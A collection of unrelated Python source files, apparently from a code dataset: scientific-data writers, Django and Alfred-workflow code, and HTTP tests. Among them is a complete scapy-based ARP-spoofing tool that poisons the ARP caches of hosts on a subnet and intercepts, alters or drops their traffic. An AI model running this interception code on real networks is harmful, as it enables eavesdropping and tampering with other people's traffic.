f"{parent_path}/{detector_name}")
self._writer.add_dataset(detector_group, "depends_on", data=depends_on)
def _write_choppers(self, parent_group: Union[h5py.Group, Dict]):
for chopper in self._choppers:
chopper_group = self._create_nx_class(chopper.name, "NXdisk_chopper",
parent_group)
distance_ds = self._writer.add_dataset(chopper_group,
"distance",
data=chopper.distance)
rotation_ds = self._writer.add_dataset(chopper_group,
"rotation_speed",
data=chopper.rotation_speed)
if chopper.distance_units is not None:
self._writer.add_attribute(distance_ds, "units", chopper.distance_units)
if chopper.rotation_units is not None:
self._writer.add_attribute(rotation_ds, "units", chopper.rotation_units)
def _write_event_data(self, parent_group: Union[h5py.Group, Dict]):
for event_data_index, event_data in enumerate(self._event_data):
self._add_event_data_group_to_file(event_data, parent_group,
f"events_{event_data_index}")
def _write_monitors(self, parent_group: Union[h5py.Group, Dict]):
for monitor in self._monitors:
self._add_monitor_group_to_file(monitor, parent_group)
def _add_monitor_group_to_file(self, monitor: Monitor, parent_group: h5py.Group):
monitor_group = self._create_nx_class(monitor.name, "NXmonitor", parent_group)
data_group = self._writer.add_dataset(monitor_group, "data", monitor.data)
self._writer.add_attribute(data_group, "axes",
",".join(name for name, _ in monitor.axes))
if monitor.events:
self._write_event_data_to_group(monitor_group, monitor.events)
for axis_name, axis_data in monitor.axes:
# We write event data (if exists) first - if we've already written event
# data the event index will already have been created so we skip writing
# it here.
if not monitor.events or not axis_name == "event_index":
self._writer.add_dataset(monitor_group, axis_name, axis_data)
def _write_logs(self, parent_group: Union[h5py.Group, Dict]):
for log in self._logs:
self._add_log_group_to_file(log, parent_group)
def _add_event_data_group_to_file(self, data: EventData, parent_group: h5py.Group,
group_name: str):
event_group = self._create_nx_class(group_name, "NXevent_data", parent_group)
self._write_event_data_to_group(event_group, data)
def _write_event_data_to_group(self, event_group: h5py.Group, data: EventData):
if data.event_id is not None:
self._writer.add_dataset(event_group, "event_id", data=data.event_id)
if data.event_time_offset is not None:
event_time_offset_ds = self._writer.add_dataset(event_group,
"event_time_offset",
data=data.event_time_offset)
self._writer.add_attribute(event_time_offset_ds, "units",
data.event_time_offset_unit)
if data.event_time_zero is not None:
event_time_zero_ds = self._writer.add_dataset(event_group,
"event_time_zero",
data=data.event_time_zero)
self._writer.add_attribute(event_time_zero_ds, "units",
data.event_time_zero_unit)
self._writer.add_attribute(event_time_zero_ds, "offset",
data.event_time_zero_offset)
if data.event_index is not None:
self._writer.add_dataset(event_group, "event_index", data=data.event_index)
def _add_transformations_to_file(self, transform: Transformation,
parent_group: h5py.Group, parent_path: str) -> str:
transform_chain = [transform]
while transform.depends_on is not None and not isinstance(
transform.depends_on, str):
transform_chain.append(transform.depends_on)
transform = transform.depends_on
transforms_group_name = "transformations"
transforms_group = self._create_nx_class("transformations", "NXtransformations",
parent_group)
transform_chain.reverse()
depends_on_str = transform.depends_on if isinstance(transform.depends_on,
str) else None
transform_group_path = f"{parent_path}/{transforms_group_name}"
for transform_number, transform in enumerate(transform_chain):
if transform.time is not None:
depends_on_str = self._add_transformation_as_log(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
else:
depends_on_str = self._add_transformation_as_dataset(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
return depends_on_str
def _add_transformation_as_dataset(self, transform: Transformation,
transform_number: int,
transforms_group: h5py.Group, group_path: str,
depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._writer.add_dataset(transforms_group,
f"transform_{transform_number}",
data=transform.value)
self._add_transform_attributes(added_transform, depends_on, transform)
if transform.value_units is not None:
self._writer.add_attribute(added_transform, "units", transform.value_units)
return f"{group_path}/{transform_name}"
def _add_log_group_to_file(self, log: Log, parent_group: h5py.Group) -> h5py.Group:
log_group = self._create_nx_class(log.name, "NXlog", parent_group)
if log.value is not None:
value_ds = self._writer.add_dataset(log_group, "value", log.value)
if log.value_units is not None:
self._writer.add_attribute(value_ds, "units", log.value_units)
if log.time is not None:
time_ds = self._writer.add_dataset(log_group, "time", data=log.time)
if log.time_units is not None:
self._writer.add_attribute(time_ds, "units", log.time_units)
if log.start_time is not None:
self._writer.add_attribute(time_ds, "start", log.start_time)
if log.scaling_factor is not None:
self._writer.add_attribute(time_ds, "scaling_factor",
log.scaling_factor)
return log_group
def _add_transformation_as_log(self, transform: Transformation,
transform_number: int, transforms_group: h5py.Group,
group_path: str, depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._add_log_group_to_file(
Log(transform_name, transform.value, transform.time, transform.value_units,
transform.time_units), transforms_group)
self._add_transform_attributes(added_transform, depends_on, transform)
return f"{group_path}/{transform_name}"
def _add_detector_group_to_file(self, detector: Detector, parent_group: h5py.Group,
group_name: str) -> h5py.Group:
detector_group = self._create_nx_class(group_name, "NXdetector", parent_group)
if detector.detector_numbers is not None:
self._writer.add_dataset(detector_group, "detector_number",
detector.detector_numbers)
for dataset_name, array in (("x_pixel_offset", detector.x_offsets),
("y_pixel_offset", detector.y_offsets),
("z_pixel_offset", detector.z_offsets)):
if array is not None:
offsets_ds = self._writer.add_dataset(detector_group, dataset_name,
array)
if detector.offsets_unit is not None:
self._writer.add_attribute(offsets_ds, "units",
detector.offsets_unit)
return detector_group
def _add_transform_attributes(self, added_transform: Union[h5py.Group,
h5py.Dataset],
depends_on: Optional[str], transform: Transformation):
self._writer.add_attribute(added_transform, "vector", transform.vector)
self._writer.add_attribute(added_transform, "transformation_type",
transform.transform_type.value)
if transform.offset is not None:
self._writer.add_attribute(added_transform, "offset", transform.offset)
if depends_on is not None:
self._writer.add_attribute(added_transform, "depends_on", depends_on)
else:
self._writer.add_attribute(added_transform, "depends_on",
".") # means end of chain
def _create_nx_class(self, group_name: str, nx_class_name: str,
parent: h5root) -> h5py.Group:
nx_class = self._writer.add_group(parent, group_name)
self._writer.add_attribute(nx_class, "NX_class", nx_class_name)
return nx_class
def _write_streams(self, root: Union[h5py.File, Dict]):
if isinstance(self._writer, JsonWriter):
for stream in self._streams:
self._writer.add_stream(root, stream)
| 31,414 | 9,270 |
"""
MIT License
Copyright (c) 2018 Jacob Hartman
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
import threading
import time
import copy
from scapy.all import *
import ipaddress
def is_python_2():
return sys.version_info[0] == 2
if is_python_2():
import Queue as queue
else:
import queue
class SniffThread (threading.Thread):
def __init__(self, interface, out_queue, filter=""):
threading.Thread.__init__(self)
self._queue = out_queue
self._filter = filter
self._interface = interface
self.daemon = True
self._stop = False
def sniff(self, pkt):
self._queue.put(pkt)
def is_stopping(self, pkt):
return self._stop
def run(self):
sniff(prn=self.sniff, store=0, iface=self._interface, filter=self._filter, stop_filter=self.is_stopping)
print("done")
def stop_sniffing(self):
self._stop = True
class ArpRequestPoisoner(threading.Thread):
def __init__(self, mac, interface, ip_map, free_ip, incr=2):
threading.Thread.__init__(self)
self.daemon = True
self._mac = mac
self._interface = interface
self._ip_map = ip_map
self._incr = incr
self._running = True
self._free_ip = free_ip
def stop_poison(self):
self._running = False
def run(self):
# Poisoning
while self._running:
for ip in self._ip_map:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, hwsrc=self._mac, pdst=self._free_ip, psrc=ip)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
print("ArpRequestPoisoner stopped, re-arping...")
# Re-arping clients
for i in range(3):
for ip in self._ip_map:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._ip_map[ip], type=0x806)/ARP(op=1, hwsrc=self._ip_map[ip], pdst=self._free_ip, psrc=ip)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
for i in range(3):
for ip in self._ip_map:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, hwsrc=self._mac, pdst=ip, psrc=self._free_ip)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
class ArpResponsePoisoner(threading.Thread):
def __init__(self, mac, interface, ip_map, incr=2):
threading.Thread.__init__(self)
self.daemon = True
self._mac = mac
self._interface = interface
self._ip_map = ip_map
self._incr = incr
self._running = True
def stop_poison(self):
self._running = False
def run(self):
# Poisoning
while self._running:
for sender_ip in self._ip_map:
for resp_ip in self._ip_map:
arp_frame = Ether(
dst=self._ip_map[sender_ip],
src=self._mac,
type=0x806)/ARP(
op=2,
pdst=sender_ip,
hwdst=self._ip_map[sender_ip],
psrc=resp_ip,
hwsrc=self._mac)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
print("ArpResponsePoisoner stopped, re-arping...")
# Re-arping clients
for i in range(3):
for sender_ip in self._ip_map:
for resp_ip in self._ip_map:
arp_frame = Ether(
dst=self._ip_map[sender_ip],
src=self._ip_map[resp_ip],
type=0x806)/ARP(
op=2,
pdst=sender_ip,
hwdst=self._ip_map[sender_ip],
psrc=resp_ip,
hwsrc=self._ip_map[resp_ip])
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
class PacketIntercept(threading.Thread):
def __init__(self, mac_address, ip_address, interface, ip_map, on_packet):
threading.Thread.__init__(self)
self._on_packet = on_packet
self._mac = mac_address
self._interface = interface
self._ip_map = ip_map
self._ip = ip_address
self._running = True
self._pkt_queue = queue.Queue()
def stop_processing(self):
self._running = False
self._pkt_queue.put(None)
def run(self):
on_packet_sniff = SniffThread(self._interface, self._pkt_queue, "not arp and not host " + str(self._ip) + " and ether host " + self._mac)
on_packet_sniff.start()
while self._running:
pkt = self._pkt_queue.get()
if pkt and Ether in pkt and pkt.dst == self._mac and pkt.src != self._mac:
if self._on_packet:
send_pkt = self._on_packet(copy.deepcopy(pkt))
else:
send_pkt = pkt
# False means to drop the packet
if send_pkt:
if Ether in send_pkt and IP in send_pkt and send_pkt[IP].dst in self._ip_map:
send_ip = send_pkt[IP].dst
send_pkt[Ether].dst = self._ip_map[send_ip]
send_pkt[Ether].src = self._mac
sendp(send_pkt, iface=self._interface, verbose=0)
on_packet_sniff.stop_sniffing()
class ArpSpoofer():
def __init__(self, network_address, interface, mac_address, ip_address):
self._target_addresses = []
# Check for a range
if "-" in network_address:
parts = network_address.split("-")
start_ip = ipaddress.ip_address(parts[0])
last_octet = int(start_ip.exploded.split(".")[3])
range_end = int(parts[1])
counter = last_octet
offset = 0
while counter <= range_end:
self._target_addresses.append(start_ip+offset)
counter += 1
offset += 1
# Assume its a network with a mask
else:
network_address = None
if is_python_2():
network_address = ipaddress.ip_network(unicode(network_address))
else:
network_address = ipaddress.ip_network(network_address)
for host in network_address.hosts():
self._target_addresses.append(host)
# Parse the source IP
if is_python_2():
self._ip = ipaddress.ip_address(unicode(ip_address))
else:
self._ip = ipaddress.ip_address(ip_address)
self._interface = interface
self._mac = mac_address
self._on_intercept = None
self._mac_map = {}
self._ip_map = {}
self._pkt_queue = None
self._running = True
self._resp_poison = None
self._req_poison = None
def set_intercept(self, intercept_func):
self._on_intercept = intercept_func
def start_spoof(self, on_packet=None):
print("Building IP to MAC address map...")
arp_queue = queue.Queue()
arp_resp_sniff = SniffThread(self._interface, arp_queue, "arp")
arp_resp_sniff.start()
time.sleep(0.5)
all_hosts = []
for host in self._target_addresses:
if host == self._ip:
print("! - Skipping self at " + str(self._ip))
continue
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, pdst=str(host), psrc=str(self._ip))
sendp(arp_frame, iface=self._interface, verbose=0)
all_hosts.append(host)
time.sleep(1)
arp_resp_sniff.stop_sniffing()
while not arp_queue.empty():
resp = arp_queue.get()
if ARP in resp and resp[ARP].op == 2:
self._mac_map[resp[ARP].hwsrc] = resp[ARP].psrc
self._ip_map[resp[ARP].psrc] = resp[ARP].hwsrc
free_ip = all_hosts[len(all_hosts)-1]
for host in self._target_addresses:
if str(host) not in self._ip_map:
free_ip = str(host)
break
print("Mapping complete...")
self._req_poison = ArpRequestPoisoner(self._mac, self._interface, self._ip_map, free_ip)
self._req_poison.start()
self._resp_poison = ArpResponsePoisoner(self._mac, self._interface, self._ip_map)
self._resp_poison.start()
print("Intercepting packets...")
self._intecept = PacketIntercept(self._mac, self._ip, self._interface, self._ip_map, on_packet)
self._intecept.start()
def stop_spoof(self):
print("Re-arping clients")
if self._resp_poison:
self._resp_poison.stop_poison()
self._resp_poison.join()
if self._req_poison:
self._req_poison.stop_poison()
self._req_poison.join()
print("Stopping intercept...")
if self._intecept:
self._intecept.stop_processing()
self._intecept.join()
| 10,351 | 3,284 |
# Copyright (c) 2017, Manito Networks, LLC
# All rights reserved.
# NOTE: This is updated as we have time, and is by no means comprehensive yet.
mac_prefix = {
"00CDFE":"Apple",
"18AF61":"Apple",
"CC46D6":"Cisco",
"58AC78":"Cisco",
"0050BA":"D-Link",
"00179A":"D-Link",
"1CBDB9":"D-Link",
"9094E4":"D-Link",
"28107B":"D-Link",
"1C7EE5":"D-Link",
"C4A81D":"D-Link",
"3CD92B":"Hewlett Packard",
"9C8E99":"Hewlett Packard",
"B499BA":"Hewlett Packard",
"1CC1DE":"Hewlett Packard",
"2C3033":"Netgear",
"FFFFFF":"Broadcast"
} | 526 | 274 |
from django.urls import path
from test_app import views
urlpatterns = [
path("save-obj/", views.save_obj_view),
path("save-obj-error/", views.save_obj_error_view),
path("create-revision/", views.create_revision_view),
path("revision-mixin/", views.RevisionMixinView.as_view()),
]
| 298 | 106 |
#===============================================================
# Restrict size of printed list
#===============================================================
import numpy as np
def restrict_sizeList(input_list, size):
''' Print a long list as [ a b c ... x y z ] '''
# For 1D arrays or list, return [ a b c ... x y z ]
if np.array(input_list).ndim == 1:
# Make sure it is a list
input_list = list(input_list)
# If the length is bigger than size*2, write it as [ a b c ... x y z ]
if len(input_list) > size*2:
string = "["
for i in np.arange(size):
string += "{0:.2f}".format(input_list[i]) + ", "
string += "..., "
for i in np.arange(len(input_list)-size, len(input_list)):
string += "{0:.2f}".format(input_list[i]) + ", "
return string[:-2] + "]"
if len(input_list) == 1:
return str(input_list[0])
else:
return str(input_list)
# For 3D array, return [[[a, b, c], ... , [d, e, f]]]
if np.array(input_list).ndim == 3:
# Make sure it is an array
input_list = np.array(input_list)
string = np.array2string(input_list, formatter={'float_kind':lambda x: "%.2E" % x})
return str(string[0:43]).replace("\n","") + ', ..., ' + str(string[-44:]).replace("\n","")
| 1,410 | 458 |
from django.contrib import admin
from .models import *
admin.site.register(Course)
admin.site.register(UserCourse)
admin.site.register(Partition)
admin.site.register(PartitionTask)
| 182 | 57 |
from db.models import *
def unpack_query_objects(objects) -> dict:
results = []
for object in objects:
results.append(object.to_dict())
return results
def stringify_object(object) -> dict:
str_obj = {}
object_dict = object.to_dict()
for i in object_dict.items():
str_obj[i[0]] = str(i[1])
return str_obj
| 350 | 117 |
import gdsfactory as gf
from gdsfactory.gdsdiff.gdsdiff import gdsdiff
if __name__ == "__main__":
c1 = gf.components.straight(length=2)
c2 = gf.components.straight(length=3)
c = gdsdiff(c1, c2)
c.show()
| 221 | 99 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2016 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2016-12-17
#
"""searchio reload [-h]
Update info.plist from saved searches.
Usage:
searchio reload [--defaults]
searchio -h
Options:
-d, --defaults Use default searches, not user's.
-h, --help Display this help message.
"""
from __future__ import print_function, absolute_import
import json
import os
from plistlib import readPlist, readPlistFromString, writePlist
from docopt import docopt
from searchio.core import Context
from searchio.engines import Search
from searchio import util
log = util.logger(__name__)
# X position of all generated Script Filters
XPOS = 270
# Y position of first Script Filter
YPOS = 220
# Vertical space between (top of) each Script Filter
YOFFSET = 170
# UID of action to connect Script Filters to
OPEN_URL_UID = '1133DEAA-5A8F-4E7D-9E9C-A76CB82D9F92'
SCRIPT_FILTER = """
<dict>
<key>config</key>
<dict>
<key>alfredfiltersresults</key>
<false/>
<key>alfredfiltersresultsmatchmode</key>
<integer>0</integer>
<key>argumenttrimmode</key>
<integer>0</integer>
<key>argumenttype</key>
<integer>0</integer>
<key>escaping</key>
<integer>102</integer>
<key>keyword</key>
<string>g</string>
<key>queuedelaycustom</key>
<integer>3</integer>
<key>queuedelayimmediatelyinitially</key>
<false/>
<key>queuedelaymode</key>
<integer>0</integer>
<key>queuemode</key>
<integer>2</integer>
<key>runningsubtext</key>
<string>Fetching results…</string>
<key>script</key>
<string>./searchio search google-en "$1"</string>
<key>scriptargtype</key>
<integer>1</integer>
<key>scriptfile</key>
<string></string>
<key>subtext</key>
<string>Searchio!</string>
<key>title</key>
<string>Google Search (English)</string>
<key>type</key>
<integer>0</integer>
<key>withspace</key>
<true/>
</dict>
<key>type</key>
<string>alfred.workflow.input.scriptfilter</string>
<key>uid</key>
<string>18E144DF-1054-4A12-B5F0-AC05C6F7DEFD</string>
<key>version</key>
<integer>2</integer>
</dict>
"""
# Default search engines
DEFAULTS = [
{
'title': 'Google (English)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'g',
'search_url': 'https://www.google.com/search?q={query}&hl=en&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=en',
'uid': 'google-en',
},
{
'title': 'Google (Deutsch)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'gd',
'search_url': 'https://www.google.com/search?q={query}&hl=de&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=de',
'uid': 'google-de',
},
{
'title': 'Wikipedia (English)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'w',
'search_url': 'https://en.wikipedia.org/wiki/{query}',
'suggest_url': 'https://en.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-en',
},
{
'title': 'Wikipedia (Deutsch)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'wd',
'search_url': 'https://de.wikipedia.org/wiki/{query}',
'suggest_url': 'https://de.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-de',
},
{
'title': 'YouTube (United States)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'yt',
'search_url': 'https://www.youtube.com/results?gl=us&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=us&q={query}',
'uid': 'youtube-us',
},
{
'title': 'YouTube (Germany)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'ytd',
'search_url': 'https://www.youtube.com/results?gl=de&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=de&q={query}',
'uid': 'youtube-de',
},
]
def usage(wf=None):
"""CLI usage instructions."""
return __doc__
def remove_script_filters(wf, data):
"""Remove auto-generated Script Filters from info.plist data."""
ids = set()
for k, d in data['uidata'].items():
if 'colorindex' not in d:
ids.add(k)
keep = []
delete = []
for obj in data['objects']:
if obj['uid'] in ids and \
obj['type'] == 'alfred.workflow.input.scriptfilter':
log.info('Removed Script Filter "%s" (%s)',
obj['config']['title'], obj['uid'])
delete.append(obj['uid'])
continue
keep.append(obj)
data['objects'] = keep
# Remove connections and uidata
for uid in delete:
del data['connections'][uid]
del data['uidata'][uid]
def add_script_filters(wf, data, searches=None):
"""Add user searches to info.plist data."""
ctx = Context(wf)
only = set()
if searches: # add them to the user's searches dir
for s in searches:
path = os.path.join(ctx.searches_dir, s.uid + '.json')
with open(path, 'wb') as fp:
json.dump(s.dict, fp)
only.add(s.uid)
log.info('Saved search "%s"', s.title)
f = util.FileFinder([ctx.searches_dir], ['json'])
searches = [Search.from_file(p) for p in f]
if only:
searches = [s for s in searches if s.uid in only]
searches.sort(key=lambda s: s.title)
ypos = YPOS
for s in searches:
if not s.keyword:
log.error('No keyword for search "%s" (%s)', s.title, s.uid)
continue
d = readPlistFromString(SCRIPT_FILTER)
d['uid'] = s.uid
d['config']['title'] = s.title
# d['config']['script'] = './searchio search {} "$1"'.format(s.uid)
d['config']['script'] = './search {} "$1"'.format(s.uid)
d['config']['keyword'] = s.keyword
data['objects'].append(d)
data['connections'][s.uid] = [{
'destinationuid': OPEN_URL_UID,
'modifiers': 0,
'modifiersubtext': '',
'vitoclose': False,
}]
data['uidata'][s.uid] = {
'note': s.title,
'xpos': XPOS,
'ypos': ypos,
}
ypos += YOFFSET
log.info('Added Script Filter "%s" (%s)', s.title, s.uid)
link_icons(wf, searches)
def link_icons(wf, searches):
"""Create symlinks for Script Filter icons."""
# Remove existing icon symlinks
for fn in os.listdir(wf.workflowdir):
if not fn.endswith('.png'):
continue
p = wf.workflowfile(fn)
if not os.path.islink(p):
continue
os.unlink(p)
log.debug('Removed search icon "%s"', p)
for s in searches:
src = s.icon
dest = wf.workflowfile(s.uid + '.png')
if os.path.exists(dest):
continue
src = os.path.relpath(src, wf.workflowdir)
dest = os.path.relpath(dest, wf.workflowdir)
log.debug('Linking "%s" to "%s"', src, dest)
os.symlink(src, dest)
def run(wf, argv):
"""Run ``searchio reload`` sub-command."""
args = docopt(usage(wf), argv)
searches = None
log.debug('args=%r', args)
if args['--defaults']:
searches = [Search.from_dict(d) for d in DEFAULTS]
ip = wf.workflowfile('info.plist')
data = readPlist(ip)
remove_script_filters(wf, data)
add_script_filters(wf, data, searches)
writePlist(data, ip)
| 8,239 | 2,883 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-09-11 07:00
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import lessons.filefield
class Migration(migrations.Migration):
dependencies = [
('lessons', '0004_flashcard_is_bordered'),
]
operations = [
migrations.CreateModel(
name='TargetLanguage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('target_language', models.CharField(max_length=128)),
('color', models.CharField(choices=[('RE', 'Red'), ('BL', 'Blue')], default='RE', max_length=32)),
('notes', models.CharField(max_length=64)),
('lesson', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='lessons.Lesson')),
],
),
migrations.AlterField(
model_name='activity',
name='activity_portion_type',
field=models.CharField(choices=[('GE', 'Generic/Other'), ('GR', 'Greeting'), ('WA', 'Warmup'), ('PE', 'Presentation'), ('PA', 'Practice'), ('PO', 'Production'), ('CO', 'Cooldown'), ('AS', 'Assessment')], default=None, max_length=32, null=True),
),
migrations.AlterField(
model_name='activity',
name='activity_skill_type',
field=models.CharField(choices=[('VO', 'Vocabulary Practice'), ('CO', 'Speaking Practice'), ('LI', 'Listening Practice'), ('OT', 'Other Skills (e.g.: song, dance)')], default='VO', max_length=32),
),
migrations.AlterField(
model_name='activity',
name='activity_source_type',
field=models.CharField(choices=[('BF', "Book-Free Activities -- These don't require the book."), ('BB', 'Book-Bound Activities -- These require the book.')], default='BF', max_length=32),
),
migrations.AlterField(
model_name='course',
name='course_code',
field=models.CharField(max_length=12),
),
migrations.AlterField(
model_name='flashcard',
name='flashcard_type',
field=models.CharField(choices=[('PL', 'Flashcard with picture and label'), ('PO', 'Flashcard with picture only'), ('FB', 'Two pages: front (picture) and back (label)')], default='PL', max_length=32),
),
migrations.AlterField(
model_name='flashcard',
name='orientation',
field=models.CharField(choices=[('PO', 'Portrait'), ('LA', 'Landscape')], default='PO', max_length=32),
),
migrations.AlterField(
model_name='flashcard',
name='picture',
field=lessons.filefield.ContentTypeRestrictedFileField(upload_to='media/flashcards/'),
),
]
| 2,882 | 870 |
import os
import sys
if sys.version_info >= (3, 8):
from unittest import IsolatedAsyncioTestCase as TestCase
else:
from unittest import TestCase
import pytest
import jj
from jj import server_version
from jj.apps import create_app
from jj.handlers import default_handler
from jj.matchers import MethodMatcher
from jj.resolvers import Registry, ReversedResolver
from jj.responses import Response
from .._test_utils import run
class TestResponse(TestCase):
def make_app_with_response(self, *args, **kwargs):
class App(jj.App):
resolver = self.resolver
@MethodMatcher("*", resolver=resolver)
async def handler(request):
return Response(*args, **kwargs)
return App()
def make_path(self, path):
return os.path.join(os.path.dirname(__file__), path)
def setUp(self):
self.default_app = create_app()
self.resolver = ReversedResolver(Registry(), self.default_app, default_handler)
@pytest.mark.asyncio
async def test_response_with_default_args(self):
app = self.make_app_with_response()
async with run(app) as client:
response = await client.get("/")
# status
self.assertEqual(response.status, 200)
self.assertEqual(response.reason, "OK")
# headers
self.assertEqual(response.headers.get("Server"), server_version)
self.assertEqual(response.headers.get("Content-Length"), "0")
self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
self.assertIsNotNone(response.headers.get("Date"))
self.assertEqual(len(response.headers), 4)
# body
raw = await response.read()
self.assertEqual(raw, b"")
@pytest.mark.asyncio
async def test_response_with_conflicted_args(self):
payload = "200 OK"
with self.assertRaises(Exception):
Response(text=payload, body=payload)
with self.assertRaises(Exception):
Response(text=payload, json=payload)
with self.assertRaises(Exception):
Response(body=payload, json=payload)
# Status
@pytest.mark.asyncio
async def test_response_status(self):
status = 204
app = self.make_app_with_response(status=status)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(response.status, status)
# aiohttp автоматически подставляет нужный reason
self.assertEqual(response.reason, "No Content")
@pytest.mark.asyncio
async def test_response_reason(self):
status, reason = 204, "Custom Reason"
app = self.make_app_with_response(status=status, reason=reason)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(response.status, status)
self.assertEqual(response.reason, reason)
# Body
@pytest.mark.asyncio
async def test_response_body(self):
body = "200 OK"
binary_body = b"200 OK"
app = self.make_app_with_response(body=body)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.text(), body)
self.assertEqual(await response.read(), binary_body)
self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
@pytest.mark.asyncio
async def test_response_text_body(self):
text = "200 OK"
binary_text = b"200 OK"
app = self.make_app_with_response(text=text)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.text(), text)
self.assertEqual(await response.read(), binary_text)
self.assertEqual(response.headers.get("Content-Length"), str(len(text)))
self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
@pytest.mark.asyncio
async def test_response_json_body(self):
json = {"key": None}
dumped_json = '{"key": null}'
binary_json = b'{"key": null}'
app = self.make_app_with_response(json=json)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.json(), json)
self.assertEqual(await response.text(), dumped_json)
self.assertEqual(await response.read(), binary_json)
self.assertEqual(response.headers.get("Content-Length"), str(len(dumped_json)))
self.assertEqual(response.headers.get("Content-Type"), "application/json")
@pytest.mark.asyncio
async def test_response_json_body_with_custom_content_type(self):
json = {"key": None}
dumped_json = '{"key": null}'
binary_json = b'{"key": null}'
content_type = "text/plain"
app = self.make_app_with_response(json=json, headers={"Content-Type": content_type})
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.text(), dumped_json)
self.assertEqual(await response.read(), binary_json)
self.assertEqual(response.headers.get("Content-Length"), str(len(dumped_json)))
self.assertEqual(response.headers.get("Content-Type"), content_type)
@pytest.mark.asyncio
async def test_response_null_json_body(self):
json = None
dumped_json = 'null'
binary_json = b'null'
app = self.make_app_with_response(json=json)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.json(), json)
self.assertEqual(await response.text(), dumped_json)
self.assertEqual(await response.read(), binary_json)
self.assertEqual(response.headers.get("Content-Length"), str(len(dumped_json)))
self.assertEqual(response.headers.get("Content-Type"), "application/json")
@pytest.mark.asyncio
async def test_response_binary_body(self):
body = b"200 OK"
app = self.make_app_with_response(body=body)
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.text(), body.decode())
self.assertEqual(await response.read(), body)
self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
self.assertEqual(response.headers.get("Content-Type"), "application/octet-stream")
@pytest.mark.asyncio
async def test_response_predefined_text_body(self):
path = self.make_path("fixtures/users.json")
with open(path, "rt") as f:
body = f.read()
app = self.make_app_with_response(body=open(path, "rt"))
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.text(), body)
self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
self.assertEqual(response.headers.get("Content-Disposition"), "inline")
@pytest.mark.asyncio
async def test_response_predefined_binary_body(self):
path = self.make_path("fixtures/users.json")
with open(path, "rb") as f:
body = f.read()
app = self.make_app_with_response(body=open(path, "rb"))
async with run(app) as client:
response = await client.get("/")
self.assertEqual(await response.text(), body.decode())
self.assertEqual(await response.read(), body)
self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
self.assertEqual(response.headers.get("Content-Type"), "application/json")
